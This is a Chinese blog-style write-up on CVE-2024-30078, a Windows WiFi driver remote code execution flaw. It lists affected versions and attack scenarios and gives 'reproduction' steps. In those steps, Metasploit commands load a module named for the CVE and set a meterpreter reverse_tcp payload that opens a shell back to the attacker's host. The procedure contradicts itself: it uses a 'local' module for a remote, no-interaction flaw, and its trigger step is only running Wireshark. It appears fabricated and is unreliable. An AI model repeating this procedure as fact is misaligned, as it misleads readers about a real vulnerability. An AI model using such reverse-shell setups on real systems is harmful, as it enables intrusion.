Windows WiFi 驱动程序远程代码执行漏洞（CVE-2024-30078）_cve-2024-30078 exploit

Windows WiFi 驱动程序远程代码执行漏洞（CVE-2024-30078）

漏洞描述

此漏洞与WiFi驱动程序相关，允许攻击者在同一WiFi网络下远程执行代码，且这一过程不需要用户的任何交互。这意味着如果用户在公共场所，如机场、咖啡店或办公环境中使用受影响的设备连接到WiFi，设备可能会面临安全风险。

影响范围

Microsoft-Windows 10 1809
Microsoft-Windows Server 2012
Microsoft-Windows Server 2019
Microsoft-Windows 10 1607
Microsoft-Windows Server 2022
Microsoft-Windows 10 1507
version<10.0.10240.20680，version<10.0.14393.7070，version<10.0.17763.5936，version<10.0.19044.4529，version<10.0.19045.4529，version<10.0.22000.3019，version<10.0.22621.3737，version<10.0.22631.3737，version<10.0.14393.7070，version<10.0.17763.5936，version<10.0.20348.2522，version<10.0.25398.950受影响。
Microsoft-Windows 10 22h2
Microsoft-Windows 11 Version 21H2
Microsoft-Windows Server 2016
Microsoft-Windows Server 2008
Microsoft-Windows 10 21h2
Microsoft-Windows 11 Version 22H2
Microsoft-Windows 11 23h2
Microsoft-Windows Server 2022 23h2
Microsoft-Windows 11
Microsoft-Windows 10

漏洞利用过程

攻击者可能通过以下方式利用该漏洞：

• 创建恶意网络，引诱用户连接，然后利用漏洞执行远程代码。
• 利用中间人攻击（MITM）来截获和修改网络流量。
• 利用附近的无线接入点（AP）来传播恶意代码。

复现过程

1. 环境准备
   准备Windows操作系统并且已经安装了WiFi驱动程序。
   安装Wireshark，捕获网络流量。
   kali操作系统的Metasploit。
2. 配置Metasploit。设置Metasploit为监听模式，并指定攻击载荷和目标IP地址，并启动监听器

use exploit/windows/local/cve_2024_30078_wifi_driver_rce
set LHOST <你的本地IP地址>
set RHOSTS <目标设备的IP地址>
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT <你的本地监听端口>
exploit
1
2
3
4
5
6

3. 触发漏洞:
   使用Wireshar监听目标设备上的网络流量，并尝试连接到目标设备的WiFi网络。

4. 检测漏洞利用:
   在Metasploit控制台中看到一个新的会话已建立，表示漏洞已被成功利用。如果没有新的会话，需要调整Metasploit的配置或尝试不同的攻击向量。

5. 提升权限:
   如果成功建立了会话，可以尝试提升权限，可执行任意命令。

漏洞修复

目前官方已修复此漏洞：https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30078